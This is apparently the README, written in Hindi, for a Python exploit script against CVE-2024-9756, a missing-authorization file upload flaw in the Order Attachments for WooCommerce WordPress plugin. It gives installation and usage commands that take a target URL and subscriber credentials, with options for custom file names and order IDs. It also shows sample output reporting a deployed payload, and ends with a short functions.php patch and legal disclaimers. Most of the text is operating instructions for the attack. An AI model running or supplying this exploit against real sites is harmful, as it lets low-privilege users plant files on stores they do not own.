
Order Attachments for WooCommerce 2.0 - 2.4.1 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए लापता प्राधिकरण से सीमित मनमाना फ़ाइल अपलोड
यह एक्सप्लॉइट WordPress के लिए Order Attachments for WooCommerce प्लगइन (संस्करण 2.0 से 2.4.1) में एक अनधिकृत सीमित मनमाना फ़ाइल अपलोड भेद्यता का लाभ उठाता है।
यह भेद्यता प्रमाणित उपयोगकर्ताओं (Subscriber+) को उचित प्राधिकरण के बिना प्रतिबंधित फ़ाइल प्रकार अपलोड करने की अनुमति देती है।
यह स्क्रिप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। जिन सिस्टम्स के आप स्वामी नहीं हैं, उन पर इस एक्सप्लॉइट का कोई भी अनधिकृत उपयोग पूर्णतः अवैध है।
एक्सप्लॉइट चलाने से पहले सुनिश्चित करें कि आपके पास निम्नलिखित हैं:
requests मॉड्यूल → इसे इंस्टॉल करें:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
उदाहरण:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
आप कस्टम फ़ाइल नाम और ऑर्डर ID निर्दिष्ट कर सकते हैं:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
सफल होने पर, स्क्रिप्ट अपलोड की गई फ़ाइल का URL लौटाएगी:
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
wp_ajax_wcoa_add_attachment को ब्लॉक करने के लिए functions.php को संशोधित करें:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों और सुरक्षा अनुसंधान के लिए प्रकाशित किया गया है।
स्पष्ट अनुमति के बिना सिस्टम्स के विरुद्ध अनधिकृत उपयोग अवैध है और साइबर सुरक्षा कानूनों के तहत दंडनीय है।
अपने जोखिम पर उपयोग करें।